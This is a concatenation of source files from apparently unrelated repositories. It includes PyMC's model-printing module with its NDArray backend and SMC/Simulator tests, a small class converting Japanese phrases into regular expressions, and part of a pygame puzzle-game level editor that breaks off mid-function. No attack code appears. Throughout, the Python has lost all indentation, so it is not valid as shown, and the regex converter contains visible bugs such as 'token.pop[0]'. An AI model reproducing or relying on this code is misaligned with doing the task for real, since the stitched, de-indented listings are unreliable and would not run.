return size.type.shape == (0,) # type: ignore [attr-defined]
```
#### File: pymc/pymc/printing.py
```python
import itertools
from typing import Union
from aesara.graph.basic import walk
from aesara.tensor.basic import TensorVariable, Variable
from aesara.tensor.elemwise import DimShuffle
from aesara.tensor.random.basic import RandomVariable
from aesara.tensor.var import TensorConstant
from pymc.model import Model
__all__ = [
"str_for_dist",
"str_for_model",
"str_for_potential_or_deterministic",
]
def str_for_dist(rv: TensorVariable, formatting: str = "plain", include_params: bool = True) -> str:
"""Make a human-readable string representation of a RandomVariable in a model, either
LaTeX or plain, optionally with distribution parameter values included."""
if include_params:
# first 3 args are always (rng, size, dtype), rest is relevant for distribution
dist_args = [_str_for_input_var(x, formatting=formatting) for x in rv.owner.inputs[3:]]
print_name = rv.name if rv.name is not None else "<unnamed>"
if "latex" in formatting:
print_name = r"\text{" + _latex_escape(print_name) + "}"
dist_name = rv.owner.op._print_name[1]
if include_params:
return r"${} \sim {}({})$".format(print_name, dist_name, ",~".join(dist_args))
else:
return rf"${print_name} \sim {dist_name}$"
else: # plain
dist_name = rv.owner.op._print_name[0]
if include_params:
return r"{} ~ {}({})".format(print_name, dist_name, ", ".join(dist_args))
else:
return rf"{print_name} ~ {dist_name}"
def str_for_model(model: Model, formatting: str = "plain", include_params: bool = True) -> str:
"""Make a human-readable string representation of Model, listing all random variables
and their distributions, optionally including parameter values."""
all_rv = itertools.chain(model.unobserved_RVs, model.observed_RVs, model.potentials)
rv_reprs = [rv.str_repr(formatting=formatting, include_params=include_params) for rv in all_rv]
rv_reprs = [rv_repr for rv_repr in rv_reprs if "TransformedDistribution()" not in rv_repr]
if not rv_reprs:
return ""
if "latex" in formatting:
rv_reprs = [
rv_repr.replace(r"\sim", r"&\sim &").strip("$")
for rv_repr in rv_reprs
if rv_repr is not None
]
return r"""$$
\begin{{array}}{{rcl}}
{}
\end{{array}}
$$""".format(
"\\\\".join(rv_reprs)
)
else:
# align vars on their ~
names = [s[: s.index("~") - 1] for s in rv_reprs]
distrs = [s[s.index("~") + 2 :] for s in rv_reprs]
maxlen = str(max(len(x) for x in names))
rv_reprs = [
("{name:>" + maxlen + "} ~ {distr}").format(name=n, distr=d)
for n, d in zip(names, distrs)
]
return "\n".join(rv_reprs)
def str_for_potential_or_deterministic(
var: TensorVariable,
formatting: str = "plain",
include_params: bool = True,
dist_name: str = "Deterministic",
) -> str:
"""Make a human-readable string representation of a Deterministic or Potential in a model, either
LaTeX or plain, optionally with distribution parameter values included."""
print_name = var.name if var.name is not None else "<unnamed>"
if "latex" in formatting:
print_name = r"\text{" + _latex_escape(print_name) + "}"
if include_params:
return rf"${print_name} \sim \operatorname{{{dist_name}}}({_str_for_expression(var, formatting=formatting)})$"
else:
return rf"${print_name} \sim \operatorname{{{dist_name}}}$"
else: # plain
if include_params:
return rf"{print_name} ~ {dist_name}({_str_for_expression(var, formatting=formatting)})"
else:
return rf"{print_name} ~ {dist_name}"
def _str_for_input_var(var: Variable, formatting: str) -> str:
def _is_potential_or_determinstic(var: Variable) -> bool:
try:
return var.str_repr.__func__.func is str_for_potential_or_deterministic
except AttributeError:
# in case other code overrides str_repr, fallback
return False
if isinstance(var, TensorConstant):
return _str_for_constant(var, formatting)
elif isinstance(var.owner.op, RandomVariable) or _is_potential_or_determinstic(var):
# show the names for RandomVariables, Deterministics, and Potentials, rather
# than the full expression
return _str_for_input_rv(var, formatting)
elif isinstance(var.owner.op, DimShuffle):
return _str_for_input_var(var.owner.inputs[0], formatting)
else:
return _str_for_expression(var, formatting)
def _str_for_input_rv(var: Variable, formatting: str) -> str:
_str = var.name if var.name is not None else "<unnamed>"
if "latex" in formatting:
return r"\text{" + _latex_escape(_str) + "}"
else:
return _str
def _str_for_constant(var: TensorConstant, formatting: str) -> str:
if len(var.data.shape) == 0:
return f"{var.data:.3g}"
elif len(var.data.shape) == 1 and var.data.shape[0] == 1:
return f"{var.data[0]:.3g}"
elif "latex" in formatting:
return r"\text{<constant>}"
else:
return r"<constant>"
def _str_for_expression(var: Variable, formatting: str) -> str:
# construct a string like f(a1, ..., aN) listing all random variables a as arguments
def _expand(x):
if x.owner and (not isinstance(x.owner.op, RandomVariable)):
return reversed(x.owner.inputs)
parents = [
x
for x in walk(nodes=var.owner.inputs, expand=_expand)
if x.owner and isinstance(x.owner.op, RandomVariable)
]
names = [x.name for x in parents]
if "latex" in formatting:
return r"f(" + ",~".join([r"\text{" + _latex_escape(n) + "}" for n in names]) + ")"
else:
return r"f(" + ", ".join(names) + ")"
def _latex_escape(text: str) -> str:
# Note that this is *NOT* a proper LaTeX escaper, on purpose. _repr_latex_ is
# primarily used in the context of Jupyter notebooks, which render using MathJax.
# MathJax is a subset of LaTeX proper, which expects only $ to be escaped. If we were
# to also escape e.g. _ (replace with \_), then "\_" will show up in the output, etc.
return text.replace("$", r"\$")
def _default_repr_pretty(obj: Union[TensorVariable, Model], p, cycle):
"""Handy plug-in method to instruct IPython-like REPLs to use our str_repr above."""
# we know that our str_repr does not recurse, so we can ignore cycle
try:
output = obj.str_repr()
# Find newlines and replace them with p.break_()
# (see IPython.lib.pretty._repr_pprint)
lines = output.splitlines()
with p.group():
for idx, output_line in enumerate(lines):
if idx:
p.break_()
p.text(output_line)
except AttributeError:
# the default fallback option (no str_repr method)
IPython.lib.pretty._repr_pprint(obj, p, cycle)
try:
# register our custom pretty printer in ipython shells
import IPython
IPython.lib.pretty.for_type(TensorVariable, _default_repr_pretty)
IPython.lib.pretty.for_type(Model, _default_repr_pretty)
except (ModuleNotFoundError, AttributeError):
# no ipython shell
pass
```
#### File: pymc/tests/test_ndarray_backend.py
```python
import numpy as np
import numpy.testing as npt
import pytest
from pymc.backends import base, ndarray
from pymc.tests import backend_fixtures as bf
STATS1 = [{"a": np.float64, "b": bool}]
STATS2 = [
{"a": np.float64},
{
"a": np.float64,
"b": np.int64,
},
]
class TestNDArray0dSampling(bf.SamplingTestCase):
backend = ndarray.NDArray
name = None
shape = ()
class TestNDArray0dSamplingStats1(bf.SamplingTestCase):
backend = ndarray.NDArray
name = None
sampler_vars = STATS1
shape = ()
class TestNDArray0dSamplingStats2(bf.SamplingTestCase):
backend = ndarray.NDArray
name = None
sampler_vars = STATS2
shape = ()
class TestNDArray1dSampling(bf.SamplingTestCase):
backend = ndarray.NDArray
name = None
shape = 2
class TestNDArray2dSampling(bf.SamplingTestCase):
backend = ndarray.NDArray
name = None
shape = (2, 3)
class TestNDArrayStats(bf.StatsTestCase):
backend = ndarray.NDArray
name = None
shape = (2, 3)
class TestNDArray0dSelection(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = ()
sampler_vars = STATS1
class TestNDArray0dSelection2(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = ()
sampler_vars = STATS2
class TestNDArray0dSelectionStats1(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = ()
sampler_vars = STATS2
class TestNDArray0dSelectionStats2(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = ()
class TestNDArray1dSelection(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = 2
class TestNDArray2dSelection(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = (2, 3)
class TestMultiTrace(bf.ModelBackendSetupTestCase):
name = None
backend = ndarray.NDArray
shape = ()
def setup_method(self):
super().setup_method()
self.strace0 = self.strace
super().setup_method()
self.strace1 = self.strace
def test_multitrace_nonunique(self):
with pytest.raises(ValueError):
base.MultiTrace([self.strace0, self.strace1])
def test_merge_traces_no_traces(self):
with pytest.raises(ValueError):
base.merge_traces([])
def test_merge_traces_diff_lengths(self):
with self.model:
strace0 = self.backend(self.name)
strace0.setup(self.draws, 1)
for i in range(self.draws):
strace0.record(self.test_point)
strace0.close()
mtrace0 = base.MultiTrace([self.strace0])
with self.model:
strace1 = self.backend(self.name)
strace1.setup(2 * self.draws, 1)
for i in range(2 * self.draws):
strace1.record(self.test_point)
strace1.close()
mtrace1 = base.MultiTrace([strace1])
with pytest.raises(ValueError):
base.merge_traces([mtrace0, mtrace1])
def test_merge_traces_nonunique(self):
mtrace0 = base.MultiTrace([self.strace0])
mtrace1 = base.MultiTrace([self.strace1])
with pytest.raises(ValueError):
base.merge_traces([mtrace0, mtrace1])
class TestMultiTrace_add_remove_values(bf.ModelBackendSampledTestCase):
name = None
backend = ndarray.NDArray
shape = ()
def test_add_values(self):
mtrace = self.mtrace
orig_varnames = list(mtrace.varnames)
name = "new_var"
vals = mtrace[orig_varnames[0]]
mtrace.add_values({name: vals})
assert len(orig_varnames) == len(mtrace.varnames) - 1
assert name in mtrace.varnames
assert np.all(mtrace[orig_varnames[0]] == mtrace[name])
mtrace.remove_values(name)
assert len(orig_varnames) == len(mtrace.varnames)
assert name not in mtrace.varnames
class TestSqueezeCat:
def setup_method(self):
self.x = np.arange(10)
self.y = np.arange(10, 20)
def test_combine_false_squeeze_false(self):
expected = [self.x, self.y]
result = base._squeeze_cat([self.x, self.y], False, False)
npt.assert_equal(result, expected)
def test_combine_true_squeeze_false(self):
expected = [np.concatenate([self.x, self.y])]
result = base._squeeze_cat([self.x, self.y], True, False)
npt.assert_equal(result, expected)
def test_combine_false_squeeze_true_more_than_one_item(self):
expected = [self.x, self.y]
result = base._squeeze_cat([self.x, self.y], False, True)
npt.assert_equal(result, expected)
def test_combine_false_squeeze_true_one_item(self):
expected = self.x
result = base._squeeze_cat([self.x], False, True)
npt.assert_equal(result, expected)
def test_combine_true_squeeze_true(self):
expected = np.concatenate([self.x, self.y])
result = base._squeeze_cat([self.x, self.y], True, True)
npt.assert_equal(result, expected)
```
#### File: pymc/tests/test_smc.py
```python
import aesara
import aesara.tensor as at
import numpy as np
import pytest
import scipy.stats as st
from aesara.graph.basic import ancestors
from aesara.tensor.random.op import RandomVariable
from aesara.tensor.random.var import (
RandomGeneratorSharedVariable,
RandomStateSharedVariable,
)
from aesara.tensor.sort import SortOp
from arviz.data.inference_data import InferenceData
import pymc as pm
from pymc.aesaraf import floatX
from pymc.backends.base import MultiTrace
from pymc.smc.smc import IMH
from pymc.tests.helpers import SeededTest, assert_random_state_equal
class TestSMC(SeededTest):
"""Tests for the default SMC kernel"""
def setup_class(self):
super().setup_class()
self.samples = 1000
n = 4
mu1 = np.ones(n) * 0.5
mu2 = -mu1
stdev = 0.1
sigma = np.power(stdev, 2) * np.eye(n)
isigma = np.linalg.inv(sigma)
dsigma = np.linalg.det(sigma)
w1 = stdev
w2 = 1 - stdev
def two_gaussians(x):
"""
Mixture of gaussians likelihood
"""
log_like1 = (
-0.5 * n * at.log(2 * np.pi)
- 0.5 * at.log(dsigma)
- 0.5 * (x - mu1).T.dot(isigma).dot(x - mu1)
)
log_like2 = (
-0.5 * n * at.log(2 * np.pi)
- 0.5 * at.log(dsigma)
- 0.5 * (x - mu2).T.dot(isigma).dot(x - mu2)
)
return at.log(w1 * at.exp(log_like1) + w2 * at.exp(log_like2))
with pm.Model() as self.SMC_test:
X = pm.Uniform("X", lower=-2, upper=2.0, shape=n)
llk = pm.Potential("muh", two_gaussians(X))
self.muref = mu1
with pm.Model() as self.fast_model:
x = pm.Normal("x", 0, 1)
y = pm.Normal("y", x, 1, observed=0)
def test_sample(self):
initial_rng_state = np.random.get_state()
with self.SMC_test:
mtrace = pm.sample_smc(draws=self.samples, return_inferencedata=False)
# Verify sampling was done with a non-global random generator
assert_random_state_equal(initial_rng_state, np.random.get_state())
x = mtrace["X"]
mu1d = np.abs(x).mean(axis=0)
np.testing.assert_allclose(self.muref, mu1d, rtol=0.0, atol=0.03)
def test_discrete_rounding_proposal(self):
"""
Test that discrete variable values are automatically rounded
in SMC logp functions
"""
with pm.Model() as m:
z = pm.Bernoulli("z", p=0.7)
like = pm.Potential("like", z * 1.0)
smc = IMH(model=m)
smc.initialize_population()
smc._initialize_kernel()
assert smc.prior_logp_func(floatX(np.array([-0.51]))) == -np.inf
assert np.isclose(smc.prior_logp_func(floatX(np.array([-0.49]))), np.log(0.3))
assert np.isclose(smc.prior_logp_func(floatX(np.array([0.49]))), np.log(0.3))
assert np.isclose(smc.prior_logp_func(floatX(np.array([0.51]))), np.log(0.7))
assert smc.prior_logp_func(floatX(np.array([1.51]))) == -np.inf
def test_unobserved_discrete(self):
n = 10
rng = self.get_random_state()
z_true = np.zeros(n, dtype=int)
z_true[int(n / 2) :] = 1
y = st.norm(np.array([-1, 1])[z_true], 0.25).rvs(random_state=rng)
with pm.Model() as m:
z = pm.Bernoulli("z", p=0.5, size=n)
mu = pm.math.switch(z, 1.0, -1.0)
like = pm.Normal("like", mu=mu, sigma=0.25, observed=y)
trace = pm.sample_smc(chains=1, return_inferencedata=False)
assert np.all(np.median(trace["z"], axis=0) == z_true)
def test_marginal_likelihood(self):
"""
Verifies that the log marginal likelihood function
can be correctly computed for a Beta-Bernoulli model.
"""
data = np.repeat([1, 0], [50, 50])
marginals = []
a_prior_0, b_prior_0 = 1.0, 1.0
a_prior_1, b_prior_1 = 20.0, 20.0
for alpha, beta in ((a_prior_0, b_prior_0), (a_prior_1, b_prior_1)):
with pm.Model() as model:
a = pm.Beta("a", alpha, beta)
y = pm.Bernoulli("y", a, observed=data)
trace = pm.sample_smc(2000, chains=2, return_inferencedata=False)
# log_marignal_likelihood is found in the last value of each chain
lml = np.mean([chain[-1] for chain in trace.report.log_marginal_likelihood])
marginals.append(lml)
# compare to the analytical result
assert abs(np.exp(marginals[1] - marginals[0]) - 4.0) <= 1
def test_start(self):
with pm.Model() as model:
a = pm.Poisson("a", 5)
b = pm.HalfNormal("b", 10)
y = pm.Normal("y", a, b, observed=[1, 2, 3, 4])
start = {
"a": np.random.poisson(5, size=500),
"b_log__": np.abs(np.random.normal(0, 10, size=500)),
}
trace = pm.sample_smc(500, chains=1, start=start)
def test_kernel_kwargs(self):
with self.fast_model:
trace = pm.sample_smc(
draws=10,
chains=1,
threshold=0.7,
correlation_threshold=0.02,
return_inferencedata=False,
kernel=pm.smc.IMH,
)
assert trace.report.threshold == 0.7
assert trace.report.n_draws == 10
assert trace.report.correlation_threshold == 0.02
with self.fast_model:
trace = pm.sample_smc(
draws=10,
chains=1,
threshold=0.95,
correlation_threshold=0.02,
return_inferencedata=False,
kernel=pm.smc.MH,
)
assert trace.report.threshold == 0.95
assert trace.report.n_draws == 10
assert trace.report.correlation_threshold == 0.02
@pytest.mark.parametrize("chains", (1, 2))
def test_return_datatype(self, chains):
draws = 10
with self.fast_model:
idata = pm.sample_smc(chains=chains, draws=draws)
mt = pm.sample_smc(chains=chains, draws=draws, return_inferencedata=False)
assert isinstance(idata, InferenceData)
assert "sample_stats" in idata
assert idata.posterior.dims["chain"] == chains
assert idata.posterior.dims["draw"] == draws
assert isinstance(mt, MultiTrace)
assert mt.nchains == chains
assert mt["x"].size == chains * draws
def test_convergence_checks(self):
with self.fast_model:
with pytest.warns(
UserWarning,
match="The number of samples is too small",
):
pm.sample_smc(draws=99)
def test_deprecated_parallel_arg(self):
with self.fast_model:
with pytest.warns(
FutureWarning,
match="The argument parallel is deprecated",
):
pm.sample_smc(draws=10, chains=1, parallel=False)
def test_deprecated_abc_args(self):
with self.fast_model:
with pytest.warns(
FutureWarning,
match='The kernel string argument "ABC" in sample_smc has been deprecated',
):
pm.sample_smc(draws=10, chains=1, kernel="ABC")
with pytest.warns(
FutureWarning,
match='The kernel string argument "Metropolis" in sample_smc has been deprecated',
):
pm.sample_smc(draws=10, chains=1, kernel="Metropolis")
with pytest.warns(
FutureWarning,
match="save_sim_data has been deprecated",
):
pm.sample_smc(draws=10, chains=1, save_sim_data=True)
with pytest.warns(
FutureWarning,
match="save_log_pseudolikelihood has been deprecated",
):
pm.sample_smc(draws=10, chains=1, save_log_pseudolikelihood=True)
class TestSimulator(SeededTest):
"""
Tests for pm.Simulator. They are included in this file because Simulator was
designed primarily to be used with SMC sampling.
"""
@staticmethod
def count_rvs(end_node):
return len(
[
node
for node in ancestors([end_node])
if node.owner is not None and isinstance(node.owner.op, RandomVariable)
]
)
@staticmethod
def normal_sim(rng, a, b, size):
return rng.normal(a, b, size=size)
@staticmethod
def abs_diff(eps, obs_data, sim_data):
return np.mean(np.abs((obs_data - sim_data) / eps))
@staticmethod
def quantiles(x):
return np.quantile(x, [0.25, 0.5, 0.75])
def setup_class(self):
super().setup_class()
self.data = np.random.normal(loc=0, scale=1, size=1000)
with pm.Model() as self.SMABC_test:
a = pm.Normal("a", mu=0, sigma=1)
b = pm.HalfNormal("b", sigma=1)
s = pm.Simulator("s", self.normal_sim, a, b, sum_stat="sort", observed=self.data)
self.s = s
with pm.Model() as self.SMABC_potential:
a = pm.Normal("a", mu=0, sigma=1, initval=0.5)
b = pm.HalfNormal("b", sigma=1)
c = pm.Potential("c", pm.math.switch(a > 0, 0, -np.inf))
s = pm.Simulator("s", self.normal_sim, a, b, observed=self.data)
def test_one_gaussian(self):
assert self.count_rvs(self.SMABC_test.logpt()) == 1
with self.SMABC_test:
trace = pm.sample_smc(draws=1000, chains=1, return_inferencedata=False)
pr_p = pm.sample_prior_predictive(1000, return_inferencedata=False)
po_p = pm.sample_posterior_predictive(
trace, keep_size=False, return_inferencedata=False
)
assert abs(self.data.mean() - trace["a"].mean()) < 0.05
assert abs(self.data.std() - trace["b"].mean()) < 0.05
assert pr_p["s"].shape == (1000, 1000)
assert abs(0 - pr_p["s"].mean()) < 0.15
assert abs(1.4 - pr_p["s"].std()) < 0.10
assert po_p["s"].shape == (1000, 1000)
assert abs(self.data.mean() - po_p["s"].mean()) < 0.10
assert abs(self.data.std() - po_p["s"].std()) < 0.10
@pytest.mark.parametrize("floatX", ["float32", "float64"])
def test_custom_dist_sum_stat(self, floatX):
with aesara.config.change_flags(floatX=floatX):
with pm.Model() as m:
a = pm.Normal("a", mu=0, sigma=1)
b = pm.HalfNormal("b", sigma=1)
s = pm.Simulator(
"s",
self.normal_sim,
a,
b,
distance=self.abs_diff,
sum_stat=self.quantiles,
observed=self.data,
)
assert self.count_rvs(m.logpt()) == 1
with m:
pm.sample_smc(draws=100)
@pytest.mark.parametrize("floatX", ["float32", "float64"])
def test_custom_dist_sum_stat_scalar(self, floatX):
"""
Test that automatically wrapped functions cope well with scalar inputs
"""
scalar_data = 5
with aesara.config.change_flags(floatX=floatX):
with pm.Model() as m:
s = pm.Simulator(
"s",
self.normal_sim,
0,
1,
distance=self.abs_diff,
sum_stat=self.quantiles,
observed=scalar_data,
)
assert self.count_rvs(m.logpt()) == 1
with pm.Model() as m:
s = pm.Simulator(
"s",
self.normal_sim,
0,
1,
distance=self.abs_diff,
sum_stat="mean",
observed=scalar_data,
)
assert self.count_rvs(m.logpt()) == 1
def test_model_with_potential(self):
assert self.count_rvs(self.SMABC_potential.logpt()) == 1
with self.SMABC_potential:
trace = pm.sample_smc(draws=100, chains=1, return_inferencedata=False)
assert np.all(trace["a"] >= 0)
def test_simulator_metropolis_mcmc(self):
with self.SMABC_test as m:
step = pm.Metropolis([m.rvs_to_values[m["a"]], m.rvs_to_values[m["b"]]])
trace = pm.sample(step=step, return_inferencedata=False)
assert abs(self.data.mean() - trace["a"].mean()) < 0.05
assert abs(self.data.std() - trace["b"].mean()) < 0.05
def test_multiple_simulators(self):
true_a = 2
true_b = -2
data1 = np.random.normal(true_a, 0.1, size=1000)
data2 = np.random.normal(true_b, 0.1, size=1000)
with pm.Model() as m:
a = pm.Normal("a", mu=0, sigma=3)
b = pm.Normal("b", mu=0, sigma=3)
sim1 = pm.Simulator(
"sim1",
self.normal_sim,
a,
0.1,
distance="gaussian",
sum_stat="sort",
observed=data1,
)
sim2 = pm.Simulator(
"sim2",
self.normal_sim,
b,
0.1,
distance="laplace",
sum_stat="mean",
epsilon=0.1,
observed=data2,
)
assert self.count_rvs(m.logpt()) == 2
# Check that the logps use the correct methods
a_val = m.rvs_to_values[a]
sim1_val = m.rvs_to_values[sim1]
logp_sim1 = pm.joint_logpt(sim1, sim1_val)
logp_sim1_fn = aesara.function([a_val], logp_sim1)
b_val = m.rvs_to_values[b]
sim2_val = m.rvs_to_values[sim2]
logp_sim2 = pm.joint_logpt(sim2, sim2_val)
logp_sim2_fn = aesara.function([b_val], logp_sim2)
assert any(
node for node in logp_sim1_fn.maker.fgraph.toposort() if isinstance(node.op, SortOp)
)
assert not any(
node for node in logp_sim2_fn.maker.fgraph.toposort() if isinstance(node.op, SortOp)
)
with m:
trace = pm.sample_smc(return_inferencedata=False)
assert abs(true_a - trace["a"].mean()) < 0.05
assert abs(true_b - trace["b"].mean()) < 0.05
def test_nested_simulators(self):
true_a = 2
rng = self.get_random_state()
data = rng.normal(true_a, 0.1, size=1000)
with pm.Model() as m:
sim1 = pm.Simulator(
"sim1",
self.normal_sim,
params=(0, 4),
distance="gaussian",
sum_stat="identity",
)
sim2 = pm.Simulator(
"sim2",
self.normal_sim,
params=(sim1, 0.1),
distance="gaussian",
sum_stat="mean",
epsilon=0.1,
observed=data,
)
assert self.count_rvs(m.logpt()) == 2
with m:
trace = pm.sample_smc(return_inferencedata=False)
assert np.abs(true_a - trace["sim1"].mean()) < 0.1
def test_upstream_rngs_not_in_compiled_logp(self):
smc = IMH(model=self.SMABC_test)
smc.initialize_population()
smc._initialize_kernel()
likelihood_func = smc.likelihood_logp_func
# Test graph is stochastic
inarray = floatX(np.array([0, 0]))
assert likelihood_func(inarray) != likelihood_func(inarray)
# Test only one shared RNG is present
compiled_graph = likelihood_func.maker.fgraph.outputs
shared_rng_vars = [
node
for node in ancestors(compiled_graph)
if isinstance(node, (RandomStateSharedVariable, RandomGeneratorSharedVariable))
]
assert len(shared_rng_vars) == 1
def test_simulator_error_msg(self):
msg = "The distance metric not_real is not implemented"
with pytest.raises(ValueError, match=msg):
with pm.Model() as m:
sim = pm.Simulator("sim", self.normal_sim, 0, 1, distance="not_real")
msg = "The summary statistic not_real is not implemented"
with pytest.raises(ValueError, match=msg):
with pm.Model() as m:
sim = pm.Simulator("sim", self.normal_sim, 0, 1, sum_stat="not_real")
msg = "Cannot pass both unnamed parameters and `params`"
with pytest.raises(ValueError, match=msg):
with pm.Model() as m:
sim = pm.Simulator("sim", self.normal_sim, 0, params=(1))
@pytest.mark.xfail(reason="KL not refactored")
def test_automatic_use_of_sort(self):
with pm.Model() as model:
s_k = pm.Simulator(
"s_k",
None,
params=None,
distance="kullback_leibler",
sum_stat="sort",
observed=self.data,
)
assert s_k.distribution.sum_stat is pm.distributions.simulator.identity
def test_name_is_string_type(self):
with self.SMABC_potential:
assert not self.SMABC_potential.name
trace = pm.sample_smc(draws=10, chains=1, return_inferencedata=False)
assert isinstance(trace._straces[0].name, str)
def test_named_model(self):
# Named models used to fail with Simulator because the arguments to the
# random fn used to be passed by name. This is no longer true.
# https://github.com/pymc-devs/pymc/pull/4365#issuecomment-761221146
name = "NamedModel"
with pm.Model(name=name):
a = pm.Normal("a", mu=0, sigma=1)
b = pm.HalfNormal("b", sigma=1)
s = pm.Simulator("s", self.normal_sim, a, b, observed=self.data)
trace = pm.sample_smc(draws=10, chains=2, return_inferencedata=False)
assert f"{name}::a" in trace.varnames
assert f"{name}::b" in trace.varnames
assert f"{name}::b_log__" in trace.varnames
class TestMHKernel(SeededTest):
def test_normal_model(self):
data = st.norm(10, 0.5).rvs(1000, random_state=self.get_random_state())
initial_rng_state = np.random.get_state()
with pm.Model() as m:
mu = pm.Normal("mu", 0, 3)
sigma = pm.HalfNormal("sigma", 1)
y = pm.Normal("y", mu, sigma, observed=data)
idata = pm.sample_smc(draws=2000, kernel=pm.smc.MH)
assert_random_state_equal(initial_rng_state, np.random.get_state())
post = idata.posterior.stack(sample=("chain", "draw"))
assert np.abs(post["mu"].mean() - 10) < 0.1
assert np.abs(post["sigma"].mean() - 0.5) < 0.05
def test_proposal_dist_shape(self):
with pm.Model() as m:
x = pm.Normal("x", 0, 1)
y = pm.Normal("y", x, 1, observed=0)
trace = pm.sample_smc(
draws=10,
chains=1,
kernel=pm.smc.MH,
return_inferencedata=False,
)
``` |
{
"source": "5hyn3/JPNStoRegex",
"score": 3
} |
#### File: 5hyn3/JPNStoRegex/jpns_to_regex.py
```python
import re
class JPNStoRegex:
# 各トークンに対応する正規表現演算子登録
token_table = {}
token_table['タブ'] = '\t'
token_table['任意の文字'] = '.'
token_table['英数字'] = '\w'
token_table['英数字以外'] = '\W'
token_table['空白文字'] = '\s'
token_table['空白文字以外'] = '\S'
token_table['半角数字'] = '\d'
token_table['半角数字以外'] = '\D'
token_table['単語境界'] = '\b'
token_table['か'] = '|'
token_table['全角数字'] = '[0-9]'
token_table['ひらがな'] = '[ぁ - ん]'
token_table['カタカナ'] = '[ァ - ヴ]'
token_table['半角カタカナ'] = '[ヲ - ゚]'
token_table['('] = '('
token_table[')'] = ')'
token_table['が0回以上'] = '*'
token_table['が1回以上'] = '+'
token_table['が0回または1回'] = '?'
token_table['行頭'] = '^'
token_table['行末'] = '$'
# 一部量指定子の検出及び置換用の正規表現登録
match = r"が(\d+)回"
match_repatter = re.compile(match)
more = r"が(\d+)回以上"
more_repatter = re.compile(more)
more_less = r"が(\d+)回以上(\d+)回以下"
more_less_repatter = re.compile(more_less)
def __init__(self, text):
self.text = text
raw_tokens = text.split(' ')
#半角スペース取得
self.tokens = self.get_half_space(raw_tokens)
def get_regex(self):
text = ''
for token in self.tokens:
#トークンの先頭$で無条件で文字列として処理
if token[0] is '$':
token.pop[0]
text += token
continue
if token in self.token_table.keys():
#トークンを正規表現演算子に置き換え
text += self.token_table[token]
continue
else:
if self.more_less_repatter.match(token):
text += re.sub(self.more_less_repatter, "{\\1,\\2}", token)
continue
if self.more_repatter.match(token):
text += re.sub(self.more_repatter, "{\\1,}", token)
continue
if self.match_repatter.match(token):
text += re.sub(self.match_repatter, "{\\1}", token)
continue
#文字列として処理
text += token
return text
def get_half_space(self, raw_tokens):
while '' in raw_tokens:
index = raw_tokens.index('')
if raw_tokens[index+1] == '':
#2つの空要素を1つの半角スペースに変換
raw_tokens.insert(index, ' ')
raw_tokens.remove('')
raw_tokens.remove('')
else:
#余分な空要素消去
raw_tokens.remove('')
return raw_tokens
``` |
{
"source": "5igmatic/puzzle_game",
"score": 3
} |
#### File: puzzle_game/Game/editor.py
```python
from turtle import width
import pygame
from tile import Tile
from player import Player
class Editor:
def __init__(self, size, font, WIN):
self.editorActive = False
self.cameraSpeed = 5
self.cameraX = 0
self.cameraY = 0
self.activePlayer = None
self.rotationCooldown = 0
self.rotationCooldownDuration = 20
self.tiles = pygame.sprite.Group()
self.players = pygame.sprite.Group()
self.playerIndex = 0
self.size = size
self.font = font
self.WIN = WIN
width = self.WIN.get_width()
self.exitButton = pygame.surface.Surface((20, 20)).convert_alpha()
self.exitButton.fill("white")
self.exitButtonRect = self.exitButton.get_rect(center = (width-20, 20))
self.restartButton = pygame.surface.Surface((20, 20)).convert_alpha()
self.restartButton.fill("white")
self.restartButtonRect = self.restartButton.get_rect(center = (width-60, 20))
self.playButton = pygame.surface.Surface((20, 20)).convert_alpha()
self.playButton.fill("white")
self.playButtonRect = self.playButton.get_rect(center = (width-100, 20))
self.equationKeys = {pygame.K_0: "0",
pygame.K_1: "1",
pygame.K_2: "2",
pygame.K_3: "3",
pygame.K_4: "4",
pygame.K_5: "5",
pygame.K_6: "6",
pygame.K_7: "7",
pygame.K_8: "8",
pygame.K_9: "9",
pygame.K_EQUALS: "=",
pygame.K_x: "x",
pygame.K_SLASH: "÷",
pygame.K_p: "+",
pygame.K_MINUS: "-"}
def initialise(self, width, height):
self.tiles.empty()
self.players.empty()
self.width = width
self.height = height
self.cameraX = width/2-0.5
self.cameraY = height/2-0.5
self.tilePositions = [[" "]*width for i in range(height)]
for index in range(width):
self.tilePositions[0][index] = "t"
self.tilePositions[-1][index] = "t"
newTile = Tile(index, 0, self.size)
self.tiles.add(newTile)
newTile = Tile(index, height-1, self.size)
self.tiles.add(newTile)
for index,tileRow in enumerate(self.tilePositions):
tileRow[0] = "t"
tileRow[width-1] = "t"
newTile = Tile(0, index, self.size)
self.tiles.add(newTile)
newTile = Tile(width-1, index, self.size)
self.tiles.add(newTile)
def doMovement(self):
keys = pygame.key.get_pressed()
if keys[pygame.K_w]:
self.cameraY -= self.cameraSpeed/self.size
if keys[pygame.K_s]:
self.cameraY += self.cameraSpeed/self.size
if keys[pygame.K_a]:
self.cameraX -= self.cameraSpeed/self.size
if keys[pygame.K_d]:
self.cameraX += self.cameraSpeed/self.size
if keys[pygame.K_t]:
self.placeTile()
for key in self.equationKeys:
if keys[key]:
self.activePlayer.type = self.equationKeys[key]
self.activePlayer.text.updateText(self.equationKeys[key])
if keys[pygame.K_BACKSPACE]:
self.tilePositions[self.activePlayer.y][self.activePlayer.x] = " "
self.players.remove(self.activePlayer)
if self.rotationCooldown == 0:
if keys[pygame.K_r]:
self.activePlayer.rotation += 90
self.activePlayer.updateRotation()
self.rotationCooldown = self.rotationCooldownDuration
else:
self.rotationCooldown -= 1
self.convertLayoutToList()
def validLevel(self):
for player in self.players:
if player.type == "=":
return True
return False
def mouseClick(self):
for player in self.players:
#gets the pixel location of the center of the player
playerScreenPosX = (player.x - self.cameraX) * self.size + self.WIN.get_width()/2
playerScreenPosY = (player.y - self.cameraY) * self.size + self.WIN.get_height()/2
rect = player.image.get_rect(center = (playerScreenPosX, playerScreenPosY))
if rect.collidepoint(pygame.mouse.get_pos()):
self.setActivePlayer(player)
def setActivePlayer(self, player):
if self.activePlayer != None:
self.activePlayer.original_image.fill("white")
self.activePlayer.image = self.activePlayer.original_image
self.activePlayer = player
self.activePlayer.original_image.fill("grey")
self.activePlayer.image = self.activePlayer.original_image
def placeTile(self):
mousePos = pygame.mouse.get_pos()
mousePosX = (mousePos[0]-self.WIN.get_width()/2)/self.size
